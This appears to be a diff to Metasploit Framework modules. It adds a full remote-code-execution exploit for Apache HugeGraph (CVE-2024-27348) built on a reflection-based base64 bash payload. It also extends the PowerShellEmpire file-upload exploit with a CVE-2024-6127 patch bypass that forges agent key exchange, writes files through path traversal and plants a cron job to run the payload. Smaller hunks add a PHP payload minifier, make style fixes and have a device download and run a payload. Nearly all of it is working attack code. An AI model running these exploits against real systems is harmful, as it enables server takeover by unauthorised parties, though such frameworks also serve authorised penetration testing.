+      'Description' => %q{
+        This encoder minifies a PHP payload by removing leasing spaces, trailing
+        new lines, comments, …
+      },
+      'Author' => 'Julien Voisin',
+      'License' => BSD_LICENSE,
+      'Arch' => ARCH_PHP)
+  end
+
+  def encode_block(_, buf)
+    # Remove comments
+    buf.gsub!(/^\s*#.*$/, '')
+
+    # Remove spaces after keywords
+    buf.gsub!(/^\s*(if|else|elsif|while|for|foreach)\s*\(/, '\1(')
+
+    # Remove spaces before block opening
+    buf.gsub!(/\s*{$/, '{')
+
+    # Remove empty lines
+    buf.squeeze!("\n")
+
+    # Remove leading/trailing spaces
+    buf.gsub!(/^[ \t]+/, '')
+
+    # Remove new lines
+    buf.gsub!(/([;{}])\n/, '\1')
+
+    return buf
+  end
+end
@@ -208,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote

    send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),
-      'encode_params' => false,  # we'll encode them ourselves
+      'encode_params' => false, # we'll encode them ourselves
      'vars_get' => {
        'event' => 'start',
        'target' => buffer
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache HugeGraph Gremlin RCE',
+        'Description' => %q{
+          This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in
+          Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve
+          RCE through Gremlin, resulting in complete control over the server
+        },
+        'Author' => [
+          '6right', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/'],
+          [ 'CVE', '2024-27348']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux],
+        'Privileged' => true,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-04-22',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET'
+    })
+
+    return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res
+    return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200
+
+    version = res.get_json_document&.dig('version')
+    return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
+
+    if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
+      return CheckCode::Appears("Apache HugeGraph version detected: #{version}")
+    end
+
+    CheckCode::Safe("Apache HugeGraph version detected: #{version}")
+  end
+
+  def exploit
+    print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")
+
+    class_name = rand_text_alpha(4..12)
+    thread_name = rand_text_alpha(4..12)
+    command_name = rand_text_alpha(4..12)
+    process_builder_name = rand_text_alpha(4..12)
+    start_method_name = rand_text_alpha(4..12)
+    constructor_name = rand_text_alpha(4..12)
+    field_name = rand_text_alpha(4..12)
+
+    java_payload = <<~PAYLOAD
+      Thread #{thread_name} = Thread.currentThread();
+      Class #{class_name} = Class.forName(\"java.lang.Thread\");
+      java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");
+      #{field_name}.setAccessible(true);
+      #{field_name}.set(#{thread_name}, \"#{thread_name}\");
+      Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");
+      java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);
+      java.util.List #{command_name} = java.util.Arrays.asList(#{"bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash".strip.split(' ').map { |element| "\"#{element}\"" }.join(', ')});
+      Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});
+      java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");
+      #{start_method_name}.invoke(#{process_builder_name});
+    PAYLOAD
+
+    data = {
+      'gremlin' => java_payload,
+      'bindings' => {},
+      'language' => 'gremlin-groovy',
+      'aliases' => {}
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/gremlin'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => data.to_json
+    })
+
+    print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200
+  end
+end
@@ -531,7 +531,7 @@ class MetasploitModule < Msf::Exploit::Remote
    super

    # We didn't know the previous values, so just blank out XXX
-    unless (@client_id.nil? || @csrf_token.nil? || @db_id.nil? || @values_to_reset.nil?)
+    unless @client_id.nil? || @csrf_token.nil? || @db_id.nil? || @values_to_reset.nil?
      print_status('Unsetting RCE Payloads')
      @values_to_reset.each do |row|
        next if row[0] == 'id' # headers
@@ -540,7 +540,7 @@ class MetasploitModule < Msf::Exploit::Remote

        set_query_latest_query_id
        is_binary = false
-        if (row[1].starts_with?("b'") && row[1].ends_with?("'"))
+        if row[1].starts_with?("b'") && row[1].ends_with?("'")
          row[1] = row[1][2..-2] # remove encoding and substring marks
          row[1] = Rex::Text.to_hex(row[1])
          row[1] = row[1].gsub('\x', '') # we only need a beginning \x not every character for this format
@@ -122,11 +122,6 @@ class MetasploitModule < Msf::Exploit::Remote
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
@@ -144,9 +139,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+    })

-      datastore['SSL'] = true if ssl_restore
    end

    #
@@ -155,11 +155,6 @@ class MetasploitModule < Msf::Exploit::Remote
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end

      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
@@ -174,9 +169,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+      })

-      datastore['SSL'] = true if ssl_restore
    end

    #
@@ -253,12 +253,6 @@ class MetasploitModule < Msf::Exploit::Remote
      @elf_sent = false
      resource_uri = '/' + downfile

-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
-
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
@@ -272,9 +266,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+      })

-      datastore['SSL'] = true if ssl_restore
      print_status("#{peer} - Asking the device to download and execute #{service_url}")

      filename = rand_text_alpha_lower(rand(8) + 2)
@@ -8,68 +8,104 @@ class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck

+  GENERATOR = 2
+  PRIME = '0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A087'\
+  '98E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5C'\
+  'B6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163'\
+  'FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C3290'\
+  '5E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D'\
+  '2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3'\
+  '970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A645'\
+  '21F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A9210801'\
+  '1A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF'\
+  '92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD76217048'\
+  '1CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB260264'\
+  '6DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B'\
+  '14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D17'\
+  '21D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF'\
+  '585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8'\
+  'A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E'\
+  '6DCC4024FFFFFFFFFFFFFFFF'.to_i(16)
+  STAGE0 = 1
+  STAGE1 = 2
+  STAGE2 = 3
+  RESULT_POST = 5
  TASK_DOWNLOAD = 41

  def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'PowerShellEmpire Arbitrary File Upload (Skywalker)',
-      'Description'     => %q{
-        A vulnerability existed in the PowerShellEmpire server prior to commit
-        f030cf62 which would allow an arbitrary file to be written to an
-        attacker controlled location with the permissions of the Empire server.
+    super(
+      update_info(
+        info,
+        'Name' => 'PowerShellEmpire Arbitrary File Upload (Skywalker)',
+        'Description' => %q{
+          A vulnerability existed in the new Empire (maintained by BC Security)
+          prior to commit e73e883 (<v5.9.3) or the original PowerShellEmpire
+          server prior to commit f030cf62 which would allow an arbitrary file
+          to be written to an attacker controlled location with the permissions
+          of the Empire server.

-        This exploit will write the payload to /tmp/ directory followed by a
-        cron.d file to execute the payload.
-      },
-      'Author'          =>
-        [
-          'Spencer McIntyre',   # Vulnerability discovery & Metasploit module
-          'Erik Daguerre'       # Metasploit module
-        ],
-      'License'         => MSF_LICENSE,
-      'References'      => [
-        ['URL', 'http://www.harmj0y.net/blog/empire/empire-fails/']
-      ],
-      'Payload'         =>
-        {
-          'DisableNops' => true,
+          This exploit will write the payload to /tmp/ directory followed by a
+          cron.d file to execute the payload.
        },
-      'Platform'        => %w{ linux python },
-      'Targets'         =>
-        [
+        'Author' => [
+          'Spencer McIntyre', # Vulnerability discovery & original Metasploit module
+          'Erik Daguerre',    # Original Metasploit module
+          'ACE-Responder',    # Patch bypass discovery & Python PoC
+          'Takahiro Yokoyama' # Update Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-6127'], # patch bypass
+          ['URL', 'https://blog.harmj0y.net/empire/empire-fails/'], # original http://www.harmj0y.net/blog/empire/empire-fails/ is not found.
+          ['URL', 'https://aceresponder.com/blog/exploiting-empire-c2-framework'], # patch bypass
+          ['URL', 'https://github.com/ACE-Responder/Empire-C2-RCE-PoC/tree/main'] # patch bypass
+        ],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux python],
+        'Targets' => [
          [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]
        ],
-      'DefaultOptions'  => { 'WfsDelay' => 75 },
-      'DefaultTarget'   => 0,
-      'DisclosureDate'  => '2016-10-15',
-      'Notes'           =>
-        {
-          'Stability'   => [ CRASH_SAFE, ],
+        'DefaultOptions' => { 'WfsDelay' => 75 },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2016-10-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
-        },
-    ))
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(8080),
+        # original
        OptString.new('TARGETURI', [ false, 'Base URI path', '/' ]),
        OptString.new('STAGE0_URI', [ true, 'The resource requested by the initial launcher, default is index.asp', 'index.asp' ]),
        OptString.new('STAGE1_URI', [ true, 'The resource used by the RSA key post, default is index.jsp', 'index.jsp' ]),
-        OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ])
-      ])
+        OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ]),
+        # patch bypass
+        OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2024-6127', ['CVE-2024-6127', 'Original']]),
+        OptString.new('STAGE_PATH', [ true, 'The Empire\'s staging path, default is login/process.php', 'login/process.php' ]),
+        OptString.new('AGENT', [ true, 'The Empire\'s communication profile agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'])
+      ]
+    )
  end

  def check
-    return Exploit::CheckCode::Safe if get_staging_key.nil?
+    @staging_key = get_staging_key
+    return Exploit::CheckCode::Safe if @staging_key.nil?

    Exploit::CheckCode::Appears
  end

-  def aes_encrypt(key, data, include_mac=false)
+  def aes_encrypt(key, data, include_mac: false)
    cipher = OpenSSL::Cipher.new('aes-256-cbc')
    cipher.encrypt
    iv = cipher.random_iv
@@ -83,8 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
    data
  end

-  def create_packet(res_id, data, counter=nil)
-    data = Rex::Text::encode_base64(data)
+  def create_packet(res_id, data, counter = nil)
+    data = Rex::Text.encode_base64(data)
    counter = Time.new.to_i if counter.nil?

    [ res_id, counter, data.length ].pack('VVV') + data
@@ -93,63 +129,82 @@ class MetasploitModule < Msf::Exploit::Remote
  def reversal_key
    # reversal key for commit da52a626 (March 3rd, 2016) - present (September 21st, 2016)
    [
-      [ 160, 0x3d], [  33, 0x2c], [  34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [  37, 0x2c], [  38, 0x24], [ 199, 0x2d],
-      [   8, 0x20], [  41, 0x3d], [  42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [  14, 0x2d], [  47, 0x29],
-      [ 272, 0x5d], [ 113, 0x3b], [  82, 0x3b], [  51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [  86, 0x2d], [ 183, 0x3a],
-      [  24, 0x7b], [  57, 0x2d], [ 282, 0x20], [  91, 0x20], [  92, 0x2d], [ 157, 0x3b], [  30, 0x28], [  31, 0x24]
+      [ 160, 0x3d], [ 33, 0x2c], [ 34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [ 37, 0x2c], [ 38, 0x24], [ 199, 0x2d],
+      [ 8, 0x20], [ 41, 0x3d], [ 42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [ 14, 0x2d], [ 47, 0x29],
+      [ 272, 0x5d], [ 113, 0x3b], [ 82, 0x3b], [ 51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [ 86, 0x2d], [ 183, 0x3a],
+      [ 24, 0x7b], [ 57, 0x2d], [ 282, 0x20], [ 91, 0x20], [ 92, 0x2d], [ 157, 0x3b], [ 30, 0x28], [ 31, 0x24]
    ]
  end

  def rsa_encode_int(value)
    encoded = []
-    while value > 0 do
+    while value > 0
      encoded << (value & 0xff)
      value >>= 8
    end

-    Rex::Text::encode_base64(encoded.reverse.pack('C*'))
+    Rex::Text.encode_base64(encoded.reverse.pack('C*'))
  end

  def rsa_key_to_xml(rsa_key)
-    rsa_key_xml  = "<RSAKeyValue>\n"
-    rsa_key_xml << "  <Exponent>#{ rsa_encode_int(rsa_key.e.to_i) }</Exponent>\n"
-    rsa_key_xml << "  <Modulus>#{ rsa_encode_int(rsa_key.n.to_i) }</Modulus>\n"
-    rsa_key_xml << "</RSAKeyValue>"
+    rsa_key_xml = "<RSAKeyValue>\n"
+    rsa_key_xml << "  <Exponent>#{rsa_encode_int(rsa_key.e.to_i)}</Exponent>\n"
+    rsa_key_xml << "  <Modulus>#{rsa_encode_int(rsa_key.n.to_i)}</Modulus>\n"
+    rsa_key_xml << '</RSAKeyValue>'

    rsa_key_xml
  end

  def get_staging_key
+    # patch bypass
+    if datastore['CVE'] == 'CVE-2024-6127'
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'download/python/')
+      })
+      return unless res && res.code == 200
+
+      match = /IV\+'(.*)'\.encode/.match(res.body)
+      return match[1].bytes if match
+
+      return
+    end
+
    # STAGE0_URI resource requested by the initial launcher
    # The default STAGE0_URI resource is index.asp
    # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34
    res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, datastore['STAGE0_URI'])
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI'])
    })
-    return unless res and res.code == 200
+    return unless res && res.code == 200

-    staging_key = Array.new(32, nil)
+    @staging_key = Array.new(32, nil)
    staging_data = res.body.bytes

    reversal_key.each_with_index do |(pos, char_code), key_pos|
-      staging_key[key_pos] = staging_data[pos] ^ char_code
+      @staging_key[key_pos] = staging_data[pos] ^ char_code
    end

-    return if staging_key.include? nil
+    return if @staging_key.include? nil

    # at this point the staging key should have been fully recovered but
    # we'll verify it by attempting to decrypt the header of the stage
    decrypted = []
    staging_data[0..23].each_with_index do |byte, pos|
-      decrypted << (byte ^ staging_key[pos])
+      decrypted << (byte ^ @staging_key[pos])
    end
    return unless decrypted.pack('C*').downcase == 'function start-negotiate'

-    staging_key
+    @staging_key
  end

  def write_file(path, data, session_id, session_key, server_epoch)
+    if datastore['CVE'] == 'CVE-2024-6127'
+      write_file_cve_2024_6127(path, data, session_id, session_key)
+      return
+    end
+
    # target_url.path default traffic profile for empire agent communication
    # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50
    data = create_packet(
@@ -157,24 +212,24 @@ class MetasploitModule < Msf::Exploit::Remote
      [
        '0',
        session_id + path,
-        Rex::Text::encode_base64(data)
+        Rex::Text.encode_base64(data)
      ].join('|'),
      server_epoch
    )

    if datastore['PROFILE'].blank?
-      profile_uri = normalize_uri(target_uri.path, %w{ admin/get.php news.asp login/process.jsp }.sample)
+      profile_uri = normalize_uri(target_uri.path, %w[admin/get.php news.asp login/process.jsp].sample)
    else
      profile_uri = normalize_uri(target_uri.path, datastore['PROFILE'])
    end

    res = send_request_cgi({
-      'cookie'    => "SESSIONID=#{session_id}",
-      'data'      => aes_encrypt(session_key, data, include_mac=true),
-      'method'    => 'POST',
-      'uri'       => normalize_uri(profile_uri)
+      'cookie' => "SESSIONID=#{session_id}",
+      'data' => aes_encrypt(session_key, data, include_mac: true),
+      'method' => 'POST',
+      'uri' => normalize_uri(profile_uri)
    })
-    fail_with(Failure::Unknown, "Failed to write file") unless res and res.code == 200
+    fail_with(Failure::Unknown, 'Failed to write file') unless res && res.code == 200

    res
  end
@@ -192,32 +247,88 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    vprint_status('Recovering the staging key...')
-    staging_key = get_staging_key
-    if staging_key.nil?
+    @staging_key ||= get_staging_key
+    if @staging_key.nil?
      fail_with(Failure::Unknown, 'Failed to recover the staging key')
    end
-    vprint_good("Successfully recovered the staging key: #{staging_key.map { |b| b.to_s(16) }.join(':')}")
-    staging_key = staging_key.pack('C*')
+    vprint_good("Successfully recovered the staging key: #{@staging_key.map { |b| b.to_s(16) }.join(':')}")
+    @staging_key = @staging_key.pack('C*')

-    rsa_key = OpenSSL::PKey::RSA.new(2048)
-    session_id = Array.new(50, '..').join('/')
-    # STAGE1_URI, The resource used by the RSA key post
-    # The default STAGE1_URI resource is index.jsp
-    # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37
-    res = send_request_cgi({
-      'cookie'    => "SESSIONID=#{session_id}",
-      'data'      => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, datastore['STAGE1_URI'])
-    })
-    fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200
-    vprint_good("Successfully sent the RSA key")
+    case datastore['CVE']
+    when 'CVE-2024-6127'
+      # stage0
+      # This stage is unnecessary for our purposes.
+      session_id = SecureRandom.alphanumeric(8).upcase
+      dummy = SecureRandom.alphanumeric(8)
+      send_data_to_stage(@staging_key, dummy, STAGE0, session_id)

-    # decrypt the response and pull out the epoch and session_key
-    body = rsa_key.private_decrypt(res.body)
-    server_epoch = body[0..9].to_i
-    session_key = body[10..-1]
-    print_good('Successfully negotiated an artificial Empire agent')
+      # stage1
+      dh = OpenSSL::PKey::DH.new(
+        OpenSSL::ASN1::Sequence([
+          OpenSSL::ASN1::Integer(PRIME),
+          OpenSSL::ASN1::Integer(GENERATOR)
+        ]).to_der
+      )
+      if OpenSSL::PKey.respond_to?(:generate_key)
+        dh = OpenSSL::PKey.generate_key(dh)
+      else
+        dh.generate_key!
+      end
+      private_key = dh.priv_key.to_i
+      public_key = dh.pub_key.to_s
+      res = send_data_to_stage(@staging_key, public_key, STAGE1, session_id)
+      fail_with(Failure::Unknown, 'Failed to send the key to STAGE1') unless res && res.code == 200
+      vprint_good('Successfully sent the key to STAGE1')
+
+      # decrypt the response and pull out the epoch and session_key
+      packet = aes_decrypt(@staging_key, res.body)
+      nonce = packet[..15].to_i
+      server_pub = packet[16..].to_i
+      shared_secret = server_pub.pow(private_key, PRIME)
+      # https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/encryption.py#L373
+      # _sharedSecretBytes = self.sharedSecret.to_bytes(
+      #   len(bin(self.sharedSecret)) - 2 // 8 + 1, byteorder="big"
+      # )
+      # 2(0b) + 1(- 2 // 8 + 1) = 3
+      shared_secret = to_bytes(shared_secret, shared_secret.to_s(2).length + 3)
+      sha = OpenSSL::Digest.new('sha256')
+      sha.update(shared_secret)
+      session_key = sha.digest
+      print_good('Successfully negotiated an artificial Empire agent')
+
+      # stage2
+      sysinfo = "#{nonce + 1}|#{datastore['RHOSTS']}:#{datastore['RPORT']}||:^)|:^}|127.0.1.1|:^)|False|rekt.py|2603444|python|3.11|x86_64".encode('UTF-8')
+      res = send_data_to_stage(session_key, sysinfo, STAGE2, session_id)
+      fail_with(Failure::Unknown, 'Failed to communicate with STAGE2') unless res && res.code == 200
+      aes_decrypt(session_key, res.body)
+
+      server_epoch = nil
+      log_path = "/var/lib/powershell-empire/empire/server/downloads/#{session_id}/agent.log"
+
+    else
+      rsa_key = OpenSSL::PKey::RSA.new(2048)
+      session_id = Array.new(50, '..').join('/')
+      # STAGE1_URI, The resource used by the RSA key post
+      # The default STAGE1_URI resource is index.jsp
+      # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37
+      res = send_request_cgi({
+        'cookie' => "SESSIONID=#{session_id}",
+        'data' => aes_encrypt(@staging_key, rsa_key_to_xml(rsa_key)),
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI'])
+      })
+      fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res && res.code == 200
+      vprint_good('Successfully sent the RSA key')
+
+      # decrypt the response and pull out the epoch and session_key
+      body = rsa_key.private_decrypt(res.body)
+      server_epoch = body[0..9].to_i
+      session_key = body[10..]
+      print_good('Successfully negotiated an artificial Empire agent')
+
+      log_path = '/agent.log'
+
+    end

    payload_data = nil
    payload_path = '/tmp/' + rand_text_alpha(8)
@@ -240,12 +351,102 @@ class MetasploitModule < Msf::Exploit::Remote
    print_status("Writing cron job to #{cron_path}")

    write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch)
-    print_status("Waiting for cron job to run, can take up to 60 seconds")
+    print_status('Waiting for cron job to run, can take up to 60 seconds')

    register_files_for_cleanup(cron_path)
    register_files_for_cleanup(payload_path)
    # Empire writes to a log file location based on the Session ID, so when
    # exploiting this vulnerability that file ends up in the root directory.
-    register_files_for_cleanup('/agent.log')
+    register_files_for_cleanup(log_path)
  end
+
+  def build_routing_packet(meta = 0, enc_data = ''.b, session_id = '00000000')
+    data = session_id + [2, meta, 0, enc_data.bytes.length].pack('C2SL')
+    rc4_iv = SecureRandom.random_bytes(4)
+    key = rc4_iv + @staging_key
+    rc4_enc_data = Rex::Crypto.rc4(key, data)
+    rc4_iv + rc4_enc_data + enc_data
+  end
+
+  def aes_encrypt_then_hmac(key, data)
+    data = aes_encrypt(key, data)
+    mac = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), key, data)
+    data + mac[..9]
+  end
+
+  def aes_decrypt(key, data)
+    mac = data[-10..]
+    sha256_digest = OpenSSL::Digest.new('sha256')
+    expected = OpenSSL::HMAC.digest(sha256_digest, key, data[..-11])[..9]
+    unless OpenSSL::HMAC.digest(sha256_digest, key, mac) == OpenSSL::HMAC.digest(sha256_digest, key, expected)
+      raise 'Invalid ciphertext received.'
+    end
+
+    size = key.length * 8
+    fail_with(Failure::Unknown, 'AES key width must be 128 or 256 bits') unless size == 128 || size == 256
+
+    # Create the required cipher instance
+    aes = OpenSSL::Cipher.new("AES-#{size}-CBC")
+    # Generate a truly random IV
+
+    # set up the encryption
+    aes.decrypt
+    aes.key = key
+    aes.iv = data[..15]
+
+    # decrypt!
+    aes.update(data[16..-11]) + aes.final
+  end
+
+  def compress(data)
+    start_crc32 = Zlib.crc32(data) & 0xFFFFFFFF
+    comp_data = Zlib::Deflate.deflate(data)
+    Base64.strict_encode64([start_crc32].pack('N') + comp_data)
+  end
+
+  def build_response_packet(tasking_id, packet_data)
+    packet_type = [tasking_id].pack('S')
+    total_packet = [1].pack('S')
+    packet_num = [1].pack('S')
+    result_id = [1].pack('S')
+    packet_data = Base64.strict_encode64(packet_data)
+    if packet_data.length % 4 != 0
+      packet_data += '=' * (4 - packet_data.length % 4)
+    end
+    length = [packet_data.length].pack('L')
+    packet_type + total_packet + packet_num + result_id + length + packet_data
+  end
+
+  def to_bytes(num, length = 1, little_endian: false)
+    order = little_endian ? (0...length) : (0...length).to_a.reverse
+    bytes_array = order.map { |i| (num >> i * 8) & 0xff }
+    bytes_array.pack('C*')
+  end
+
+  def write_file_cve_2024_6127(path, data, session_id, session_key)
+    path = path.split('/').join('\\')
+    packet = build_response_packet(
+      TASK_DOWNLOAD,
+      [
+        '0',
+        Array.new(50, '..').join('\\') + path,
+        data.length.to_s,
+        compress(data)
+      ].join('|')
+    )
+    send_data_to_stage(session_key, packet, RESULT_POST, session_id)
+  end
+
+  def send_data_to_stage(session_key, packet, task_id, session_id)
+    enc_packet = aes_encrypt_then_hmac(session_key, packet)
+    data = build_routing_packet(task_id, enc_packet, session_id)
+    res = send_request_cgi({
+      'data' => data,
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
+      'headers' => { 'Cookie' => datastore['AGENT'] }
+    })
+    res
+  end
+
 end
@@ -187,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin')
    )
-    users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
+    users = res.get_json_document['results'].collect { |e| e['name'] if e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0' }.compact
    # we prefer to use admin, but if it doesn't exist we chose a random one.
    if datastore['PREFER_ADMIN']
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'keep_cookies' => true
    )

-    fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}") unless (!res.nil? || res.code == 200)
+    fail_with(Failure::UnexpectedReply, "Failed to get csrf token from #{normalize_uri(target_uri.path, url)}") unless !res.nil? || res.code == 200
    csrf_token = res.get_html_document.at('//input[@name="csrf_token"]/@value')&.text
    fail_with(Failure::UnexpectedReply, "No CSRF token found when querying #{normalize_uri(target_uri.path, url)}.") unless csrf_token
